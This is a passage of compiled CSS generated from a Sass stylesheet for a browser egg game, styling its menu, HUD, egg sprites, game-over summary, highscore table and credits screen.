9; position: relative; } @media (min--moz-device-pixel-ratio: 1.3), (-o-min-device-pixel-ratio: 2.6 / 2), (-webkit-min-device-pixel-ratio: 1.3), (min-device-pixel-ratio: 1.3), (min-resolution: 1.3dppx) { /* line 451, ../sass/screen.scss */ #stage .menu_scene .title { background-image: url("/assets/Logo@2x.png"); background-size: 500px 175px; } } /* line 466, ../sass/screen.scss */ #stage .menu_scene .title.removal { -webkit-animation-delay: 0.3s; -moz-animation-delay: 0.3s; -ms-animation-delay: 0.3s; -o-animation-delay: 0.3s; animation-delay: 0.3s; } /* line 471, ../sass/screen.scss */ #stage .menu_scene .menu_item { -webkit-animation: dropMenu 0.1s 0s ease 1 normal both; -moz-animation: dropMenu 0.1s 0s ease 1 normal both; -ms-animation: dropMenu 0.1s 0s ease 1 normal both; animation: dropMenu 0.1s 0s ease 1 normal both; } /* line 473, ../sass/screen.scss */ #stage .menu_scene .menu_item.first { -webkit-animation-delay: 1.1s; -moz-animation-delay: 1.1s; -ms-animation-delay: 1.1s; -o-animation-delay: 1.1s; animation-delay: 1.1s; } /* line 476, ../sass/screen.scss */ #stage .menu_scene .menu_item.first.removal { -webkit-animation-delay: 0s; -moz-animation-delay: 0s; -ms-animation-delay: 0s; -o-animation-delay: 0s; animation-delay: 0s; } /* line 481, ../sass/screen.scss */ #stage .menu_scene .menu_item.second { -webkit-animation-delay: 1.2s; -moz-animation-delay: 1.2s; -ms-animation-delay: 1.2s; -o-animation-delay: 1.2s; animation-delay: 1.2s; } /* line 484, ../sass/screen.scss */ #stage .menu_scene .menu_item.second.removal { -webkit-animation-delay: 0.1s; -moz-animation-delay: 0.1s; -ms-animation-delay: 0.1s; -o-animation-delay: 0.1s; animation-delay: 0.1s; } /* line 489, ../sass/screen.scss */ #stage .menu_scene .menu_item.third { -webkit-animation-delay: 1.3s; -moz-animation-delay: 1.3s; -ms-animation-delay: 1.3s; -o-animation-delay: 1.3s; animation-delay: 1.3s; } /* line 492, ../sass/screen.scss */ #stage .menu_scene .menu_item.third.removal { -webkit-animation-delay: 0.2s; -moz-animation-delay: 0.2s; -ms-animation-delay: 0.2s; -o-animation-delay: 0.2s; animation-delay: 0.2s; } /* line 497, ../sass/screen.scss */ #stage .menu_scene .menu_item.fourth { -webkit-animation-delay: 1.4s; -moz-animation-delay: 1.4s; -ms-animation-delay: 1.4s; -o-animation-delay: 1.4s; animation-delay: 1.4s; } /* line 500, ../sass/screen.scss */ #stage .menu_scene .menu_item.fourth.removal { -webkit-animation-delay: 0.3s; -moz-animation-delay: 0.3s; -ms-animation-delay: 0.3s; -o-animation-delay: 0.3s; animation-delay: 0.3s; } /* line 507, ../sass/screen.scss */ #stage .menu_item { display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF29D87E', endColorstr='#FF17B362'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #29d87e), color-stop(100%, #17b362)); background-image: -webkit-linear-gradient(#29d87e, #17b362); background-image: -moz-linear-gradient(#29d87e, #17b362); background-image: -o-linear-gradient(#29d87e, #17b362); background-image: linear-gradient(#29d87e, #17b362); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #118649; text-shadow: 0 -1px 0 #19a04f; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; cursor: pointer; display: block; margin-top: 30px; margin-left: auto; margin-right: auto; font-family: BDCartoon; font-size: 22px; padding-top: 13px; height: 37px; z-index: 11; position: relative; } /* line 303, ../sass/screen.scss */ #stage .menu_item:hover { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #30f387), color-stop(100%, #0de46d)); background-image: -webkit-linear-gradient(#30f387, #0de46d); background-image: -moz-linear-gradient(#30f387, #0de46d); background-image: -o-linear-gradient(#30f387, #0de46d); background-image: linear-gradient(#30f387, #0de46d); } /* line 306, ../sass/screen.scss */ #stage .menu_item:focus { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #30f387), color-stop(100%, #0de46d)); background-image: -webkit-linear-gradient(#30f387, #0de46d); background-image: -moz-linear-gradient(#30f387, #0de46d); background-image: -o-linear-gradient(#30f387, #0de46d); background-image: linear-gradient(#30f387, #0de46d); } /* line 310, ../sass/screen.scss */ #stage .menu_item:active { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #11793a), color-stop(100%, #19a04f)); background-image: -webkit-linear-gradient(#11793a, #19a04f); background-image: -moz-linear-gradient(#11793a, #19a04f); background-image: -o-linear-gradient(#11793a, #19a04f); background-image: linear-gradient(#11793a, #19a04f); -webkit-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; -moz-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; color: #bcbdbe; border: 1px solid #03150b; } /* line 520, ../sass/screen.scss */ #stage .menu_item.large { font-size: 25px; width: 250px; } /* line 525, ../sass/screen.scss */ #stage .menu_item.small { font-size: 22px; width: 150px; } /* line 533, ../sass/screen.scss */ #stage .game_scene #hud { font-family: BDCartoon; font-size: 30px; color: #149447; position: absolute; top: 30px; left: 30px; } /* line 541, ../sass/screen.scss */ #stage .game_scene #hud p { -webkit-animation: showHUD 0.2s 0s ease 1 normal both; -moz-animation: showHUD 0.2s 0s ease 1 normal both; -ms-animation: showHUD 0.2s 0s ease 1 normal both; animation: showHUD 0.2s 0s ease 1 normal both; line-height: 40px; font-size: 30px; text-shadow: 0 1px 0 #1b724c, rgba(0, 0, 0, 0.15) 0px 2px 2px; color: #159B56; } /* line 548, ../sass/screen.scss */ #stage .game_scene #hud p.small { font-size: 20px; } /* line 551, ../sass/screen.scss */ #stage .game_scene #hud p.small span { font-size: 15px; } /* line 557, ../sass/screen.scss */ #stage .game_scene #hud #game_score { margin-top: 20px; -webkit-animation-delay: 0.1s; -moz-animation-delay: 0.1s; -ms-animation-delay: 0.1s; -o-animation-delay: 0.1s; animation-delay: 0.1s; } /* line 562, ../sass/screen.scss */ #stage .game_scene #hud #game_lives { margin-top: 20px; -webkit-animation-delay: 0.2s; -moz-animation-delay: 0.2s; -ms-animation-delay: 0.2s; -o-animation-delay: 0.2s; animation-delay: 0.2s; } /* line 567, ../sass/screen.scss */ #stage .game_scene #hud span { font-size: 20px; } /* line 572, ../sass/screen.scss */ #stage .game_scene .level_label { font-family: BDCartoon; font-size: 30px; text-shadow: 0 1px 0 #1b724c, rgba(0, 0, 0, 0.15) 0px 2px 2px; color: #159B56; display: block; text-align: center; margin-top: 20%; line-height: 40px; position: absolute; z-index: 10; width: 100%; -webkit-animation: dropMessage 0.5s 0s ease 1 normal both; -moz-animation: dropMessage 0.5s 0s ease 1 normal both; -ms-animation: dropMessage 0.5s 0s ease 1 normal both; animation: dropMessage 0.5s 0s ease 1 normal both; } /* line 586, ../sass/screen.scss */ #stage .game_scene .level_label.removal { -webkit-animation: raiseMessage 0.5s 0s ease 1 normal both; -moz-animation: raiseMessage 0.5s 0s ease 1 normal both; -ms-animation: raiseMessage 0.5s 0s ease 1 normal both; animation: raiseMessage 0.5s 0s ease 1 normal both; } /* line 591, ../sass/screen.scss */ #stage .game_scene .egg { width: 70px; height: 100px; background: url(/assets/egg_regular.png) no-repeat; background-size: contain; position: absolute; top: -100px; z-index: 3; } @media (min--moz-device-pixel-ratio: 1.3), (-o-min-device-pixel-ratio: 2.6 / 2), (-webkit-min-device-pixel-ratio: 1.3), (min-device-pixel-ratio: 1.3), (min-resolution: 1.3dppx) { /* line 591, ../sass/screen.scss */ #stage .game_scene .egg { background-image: url("/assets/egg_regular@2x.png"); background-size: 70px 100px; } } /* line 602, ../sass/screen.scss */ #stage .game_scene .egg .sprite { height: 100px; } /* line 606, ../sass/screen.scss */ #stage .game_scene .egg.cracked { background-image: url(/assets/egg_cracked.png); background-size: contain; height: 112px; -webkit-transform: rotate(-85deg); -moz-transform: rotate(-85deg); transform: rotate(-85deg); } @media (min--moz-device-pixel-ratio: 1.3), (-o-min-device-pixel-ratio: 2.6 / 2), (-webkit-min-device-pixel-ratio: 1.3), (min-device-pixel-ratio: 1.3), (min-resolution: 1.3dppx) { /* line 606, ../sass/screen.scss */ #stage .game_scene .egg.cracked { background-image: url("/assets/egg_cracked@2x.png"); background-size: 70px 100px; } } /* line 616, ../sass/screen.scss */ #stage .game_scene .egg.broken { overflow: visible !important; -webkit-transform: rotate(0deg); -moz-transform: rotate(0deg); transform: rotate(0deg); background-image: url(/assets/egg_opened.png); width: 155px; height: 120px; margin-left: -50px; margin-top: 25px; } @media (min--moz-device-pixel-ratio: 1.3), (-o-min-device-pixel-ratio: 2.6 / 2), (-webkit-min-device-pixel-ratio: 1.3), (min-device-pixel-ratio: 1.3), (min-resolution: 1.3dppx) { /* line 616, ../sass/screen.scss */ #stage .game_scene .egg.broken { background-image: url("/assets/egg_opened@2x.png"); background-size: 155px 120px; } } /* line 629, ../sass/screen.scss */ #stage .game_scene .egg.flying { top: -1200px !important; } /* line 633, ../sass/screen.scss */ #stage .game_scene .egg .cloud { position: absolute; bottom: -10px !important; width: 70px; background-position: center bottom; -webkit-transition: all 0.2s ease; -webkit-transition-delay: !important; -moz-transition: all 0.2s ease !important; -o-transition: all 0.2s ease !important; transition: all 0.2s ease !important; } /* line 640, ../sass/screen.scss */ #stage .game_scene .egg .egg_sprite_1 .cloud { height: 0px; opacity: 0 !important; } /* line 645, ../sass/screen.scss */ #stage .game_scene .egg .egg_sprite_2 .cloud { height: 30px; opacity: 1 !important; } /* line 650, ../sass/screen.scss */ #stage .game_scene .egg .egg_sprite_3 .cloud { height: 40px; } /* line 653, ../sass/screen.scss */ #stage .game_scene .egg .egg_sprite_4 .cloud { height: 50px; width: 120px; margin-left: -25px; } /* line 658, ../sass/screen.scss */ #stage .game_scene .egg .egg_sprite_5 .cloud { height: 70px; width: 120px; margin-left: -25px; bottom: -20px !important; } /* line 668, ../sass/screen.scss */ #stage .game_scene .back_button { -webkit-animation: xDrop 0.5s 0s linear 1 normal both; -moz-animation: xDrop 0.5s 0s linear 1 normal both; -ms-animation: xDrop 0.5s 0s linear 1 normal both; animation: xDrop 0.5s 0s linear 1 normal both; display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF29D87E', endColorstr='#FF17B362'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #29d87e), color-stop(100%, #17b362)); background-image: -webkit-linear-gradient(#29d87e, #17b362); background-image: -moz-linear-gradient(#29d87e, #17b362); background-image: -o-linear-gradient(#29d87e, #17b362); background-image: linear-gradient(#29d87e, #17b362); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #118649; text-shadow: 0 -1px 0 #19a04f; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; cursor: pointer; -webkit-border-radius: 50px; -moz-border-radius: 50px; -ms-border-radius: 50px; -o-border-radius: 50px; border-radius: 50px; width: 0px; height: 35px; padding: 11px 34px 2px 16px; font-family: BDCartoon; font-size: 22px; z-index: 11; position: absolute; top: 20px; right: 20px; } /* line 303, ../sass/screen.scss */ #stage .game_scene .back_button:hover { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #30f387), color-stop(100%, #0de46d)); background-image: -webkit-linear-gradient(#30f387, #0de46d); background-image: -moz-linear-gradient(#30f387, #0de46d); background-image: -o-linear-gradient(#30f387, #0de46d); background-image: linear-gradient(#30f387, #0de46d); } /* line 306, ../sass/screen.scss */ #stage .game_scene .back_button:focus { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #30f387), color-stop(100%, #0de46d)); background-image: -webkit-linear-gradient(#30f387, #0de46d); background-image: -moz-linear-gradient(#30f387, #0de46d); background-image: -o-linear-gradient(#30f387, #0de46d); background-image: linear-gradient(#30f387, #0de46d); } /* line 310, ../sass/screen.scss */ #stage .game_scene .back_button:active { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #11793a), color-stop(100%, #19a04f)); background-image: -webkit-linear-gradient(#11793a, #19a04f); background-image: -moz-linear-gradient(#11793a, #19a04f); background-image: -o-linear-gradient(#11793a, #19a04f); background-image: linear-gradient(#11793a, #19a04f); -webkit-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; -moz-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; color: #bcbdbe; border: 1px solid #03150b; } /* line 684, ../sass/screen.scss */ #stage .game_over_scene { text-align: center; position: absolute; z-index: 10; width: 100%; } /* line 690, ../sass/screen.scss */ #stage .game_over_scene .summary { -webkit-animation: dropScores 0.1s 0s ease 1 normal both; -moz-animation: dropScores 0.1s 0s ease 1 normal both; -ms-animation: dropScores 0.1s 0s ease 1 normal both; animation: dropScores 0.1s 0s ease 1 normal both; display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF29D87E', endColorstr='#FF17B362'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #29d87e), color-stop(100%, #17b362)); background-image: -webkit-linear-gradient(#29d87e, #17b362); background-image: -moz-linear-gradient(#29d87e, #17b362); background-image: -o-linear-gradient(#29d87e, #17b362); background-image: linear-gradient(#29d87e, #17b362); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #118649; text-shadow: 0 -1px 0 #19a04f; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; margin-left: auto; margin-right: auto; margin-top: 50px; width: 200px; height: 340px; z-index: 11; font-size: 25px; font-family: BDCartoon; } /* line 702, ../sass/screen.scss */ #stage .game_over_scene .summary.small { margin-top: 20px; } /* line 706, ../sass/screen.scss */ #stage .game_over_scene .summary .title { font-family: BDCartoon; padding-top: 40px; padding-bottom: 10px; z-index: 200; } /* line 713, ../sass/screen.scss */ #stage .game_over_scene .summary .end_score { margin-top: 10px; margin-bottom: 10px; background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #12854a), color-stop(100%, #0a723c)); background-image: -webkit-linear-gradient(#12854a, #0a723c); background-image: -moz-linear-gradient(#12854a, #0a723c); background-image: -o-linear-gradient(#12854a, #0a723c); background-image: linear-gradient(#12854a, #0a723c); -webkit-border-radius: 12px; -moz-border-radius: 12px; -ms-border-radius: 12px; -o-border-radius: 12px; border-radius: 12px; border: 2px solid #165735; text-shadow: 0 -1px 0 #19a04f; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; margin-left: auto; margin-right: auto; width: 150px; font-family: BDCartoon; font-size: 25px; } /* line 727, ../sass/screen.scss */ #stage .game_over_scene .summary .end_score span { font-family: BDCartoon; } /* line 730, ../sass/screen.scss */ #stage .game_over_scene .summary .end_score span.score { display: block; font-size: 60px; line-height: 50px; padding-top: 25px; -webkit-animation: pulsate 0.5s 0s ease-in-out infinite alternate both; -moz-animation: pulsate 0.5s 0s ease-in-out infinite alternate both; -ms-animation: pulsate 0.5s 0s ease-in-out infinite alternate both; animation: pulsate 0.5s 0s ease-in-out infinite alternate both; } /* line 738, ../sass/screen.scss */ #stage .game_over_scene .summary .end_score span.label { display: block; font-size: 15px; padding-bottom: 10px; } /* line 746, ../sass/screen.scss */ #stage .game_over_scene .summary .message { font-family: BDCartoon; padding-top: 10px; -webkit-animation: dropMessage 0.5s 0.5s ease 1 normal both; -moz-animation: dropMessage 0.5s 0.5s ease 1 normal both; -ms-animation: dropMessage 0.5s 0.5s ease 1 normal both; animation: dropMessage 0.5s 0.5s ease 1 normal both; } /* line 752, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button { display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF7893C3', endColorstr='#FF2B4483'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #7893c3), color-stop(100%, #2b4483)); background-image: -webkit-linear-gradient(#7893c3, #2b4483); background-image: -moz-linear-gradient(#7893c3, #2b4483); background-image: -o-linear-gradient(#7893c3, #2b4483); background-image: linear-gradient(#7893c3, #2b4483); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #1e305d; text-shadow: 0 -1px 0 #1b2e5c; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; cursor: pointer; display: block; margin-top: 20px; margin-left: auto; margin-right: auto; font-family: BDCartoon; font-size: 15px; padding-top: 5px; height: 32px; z-index: 11; position: relative; -webkit-border-radius: 20px; -moz-border-radius: 20px; -ms-border-radius: 20px; -o-border-radius: 20px; border-radius: 20px; padding-left: 0; width: 100%; padding-right: 0; } /* line 303, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button:hover { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #a2bcea), color-stop(100%, #44609a)); background-image: -webkit-linear-gradient(#a2bcea, #44609a); background-image: -moz-linear-gradient(#a2bcea, #44609a); background-image: -o-linear-gradient(#a2bcea, #44609a); background-image: linear-gradient(#a2bcea, #44609a); } /* line 306, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button:focus { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #a2bcea), color-stop(100%, #44609a)); background-image: -webkit-linear-gradient(#a2bcea, #44609a); background-image: -moz-linear-gradient(#a2bcea, #44609a); background-image: -o-linear-gradient(#a2bcea, #44609a); background-image: linear-gradient(#a2bcea, #44609a); } /* line 310, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button:active { background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #4360a9), color-stop(100%, #1b2e5c)); background-image: -webkit-linear-gradient(#4360a9, #1b2e5c); background-image: -moz-linear-gradient(#4360a9, #1b2e5c); background-image: -o-linear-gradient(#4360a9, #1b2e5c); background-image: linear-gradient(#4360a9, #1b2e5c); -webkit-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; -moz-box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; box-shadow: rgba(0, 0, 0, 0.4) 0 2px 2px inset, rgba(255, 255, 255, 0.4) 0 1px 0; color: #bcbdbe; border: 1px solid black; } /* line 769, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button img { position: relative; top: 4px; margin-right: 10px; margin-bottom: 2px; margin-top: -3px; } /* line 777, ../sass/screen.scss */ #stage .game_over_scene .summary .facebook_button .spinner { margin-top: -2px; } /* line 783, ../sass/screen.scss */ #stage .game_over_scene .menu_button { display: inline-block; margin-right: 10px; -webkit-animation: dropMenu 0.1s 0.2s ease 1 normal both; -moz-animation: dropMenu 0.1s 0.2s ease 1 normal both; -ms-animation: dropMenu 0.1s 0.2s ease 1 normal both; animation: dropMenu 0.1s 0.2s ease 1 normal both; } /* line 789, ../sass/screen.scss */ #stage .game_over_scene .menu_button.removal { -webkit-animation-delay: 0.1s; -moz-animation-delay: 0.1s; -ms-animation-delay: 0.1s; -o-animation-delay: 0.1s; animation-delay: 0.1s; } /* line 794, ../sass/screen.scss */ #stage .game_over_scene .replay_button { display: inline-block; margin-left: 10px; -webkit-animation: dropMenu 0.1s 0.3s ease 1 normal both; -moz-animation: dropMenu 0.1s 0.3s ease 1 normal both; -ms-animation: dropMenu 0.1s 0.3s ease 1 normal both; animation: dropMenu 0.1s 0.3s ease 1 normal both; } /* line 800, ../sass/screen.scss */ #stage .game_over_scene .replay_button.removal { -webkit-animation-delay: 0.2s; -moz-animation-delay: 0.2s; -ms-animation-delay: 0.2s; -o-animation-delay: 0.2s; animation-delay: 0.2s; } /* line 805, ../sass/screen.scss */ #stage .game_over_scene .menu_item.small { padding-left: 0px; padding-right: 0px; margin-top: 15px; width: 120px; } /* line 813, ../sass/screen.scss */ #stage .highscore_scene { position: absolute; width: 100%; z-index: 10; } /* line 818, ../sass/screen.scss */ #stage .highscore_scene .highscore { -webkit-animation: dropScores 0.3s 1.5s ease 1 normal both; -moz-animation: dropScores 0.3s 1.5s ease 1 normal both; -ms-animation: dropScores 0.3s 1.5s ease 1 normal both; animation: dropScores 0.3s 1.5s ease 1 normal both; display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF29D87E', endColorstr='#FF17B362'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #29d87e), color-stop(100%, #17b362)); background-image: -webkit-linear-gradient(#29d87e, #17b362); background-image: -moz-linear-gradient(#29d87e, #17b362); background-image: -o-linear-gradient(#29d87e, #17b362); background-image: linear-gradient(#29d87e, #17b362); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #118649; text-shadow: 0 -1px 0 #19a04f; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; margin-left: auto; margin-right: auto; margin-top: 20px; width: 500px; height: 410px; z-index: 11; overflow: scroll; } /* line 829, ../sass/screen.scss */ #stage .highscore_scene .highscore.removal { -webkit-animation-delay: 0.2s; -moz-animation-delay: 0.2s; -ms-animation-delay: 0.2s; -o-animation-delay: 0.2s; animation-delay: 0.2s; } /* line 833, ../sass/screen.scss */ #stage .highscore_scene .highscore p { font-family: BDCartoon; font-size: 25px; margin-top: 15px; } /* line 839, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table { width: 100%; font-family: BDCartoon; } /* line 843, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table th { font-size: 15px; } /* line 846, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table th.rank { width: 60px; } /* line 853, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table th.score { width: 80px; } /* line 857, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table th.date { width: 130px; } /* line 862, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table tr { font-size: 12px; } /* line 867, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table tr td.rank { font-size: 17px; } /* line 874, ../sass/screen.scss */ #stage .highscore_scene .highscore #score_table tr td.score { font-size: 17px; } /* line 885, ../sass/screen.scss */ #stage .highscore_scene .highscore.small { width: 280px; height: 350px; padding-left: 10px; padding-right: 10px; } /* line 891, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table { line-height: 23px; } /* line 895, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table th.rank { width: 53px; } /* line 898, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table th.name { font-size: 13px; } /* line 901, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table th.score { width: 63px; } /* line 904, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table th.date { width: 75px; } /* line 909, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table td { margin-top: 10px; } /* line 913, ../sass/screen.scss */ #stage .highscore_scene .highscore.small #score_table td.name { font-size: 13px; line-height: 15px; } /* line 921, ../sass/screen.scss */ #stage .highscore_scene .back_button { -webkit-animation: dropMenu 0.2s 1.7s ease 1 normal both; -moz-animation: dropMenu 0.2s 1.7s ease 1 normal both; -ms-animation: dropMenu 0.2s 1.7s ease 1 normal both; animation: dropMenu 0.2s 1.7s ease 1 normal both; margin-top: 10px; } /* line 925, ../sass/screen.scss */ #stage .highscore_scene .back_button.removal { -webkit-animation-delay: 0s; -moz-animation-delay: 0s; -ms-animation-delay: 0s; -o-animation-delay: 0s; animation-delay: 0s; } /* line 931, ../sass/screen.scss */ #stage .credits_scene { font-family: BDCartoon; font-size: 35px; position: absolute; z-index: 10; width: 100%; top: 40px; } /* line 939, ../sass/screen.scss */ #stage .credits_scene .credits { -webkit-animation: dropScores 0.4s 0.6s ease 1 normal both; -moz-animation: dropScores 0.4s 0.6s ease 1 normal both; -ms-animation: dropScores 0.4s 0.6s ease 1 normal both; animation: dropScores 0.4s 0.6s ease 1 normal both; display: block; width: 110px; text-decoration: none; *zoom: 1; filter: progid:DXImageTransform.Microsoft.gradient(gradientType=0, startColorstr='#FF29D87E', endColorstr='#FF17B362'); background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #29d87e), color-stop(100%, #17b362)); background-image: -webkit-linear-gradient(#29d87e, #17b362); background-image: -moz-linear-gradient(#29d87e, #17b362); background-image: -o-linear-gradient(#29d87e, #17b362); background-image: linear-gradient(#29d87e, #17b362); text-align: center; padding: 0px 30px; height: 50px; line-height: 32px; -moz-border-radius-topleft: 15px; -webkit-border-top-left-radius: 15px; border-top-left-radius: 15px; -moz-border-radius-bottomright: 15px; -webkit-border-bottom-right-radius: 15px; border-bottom-right-radius: 15px; color: white; font-size: 13px; font-weight: 400; border: 2px solid #118649; text-shadow: 0 -1px 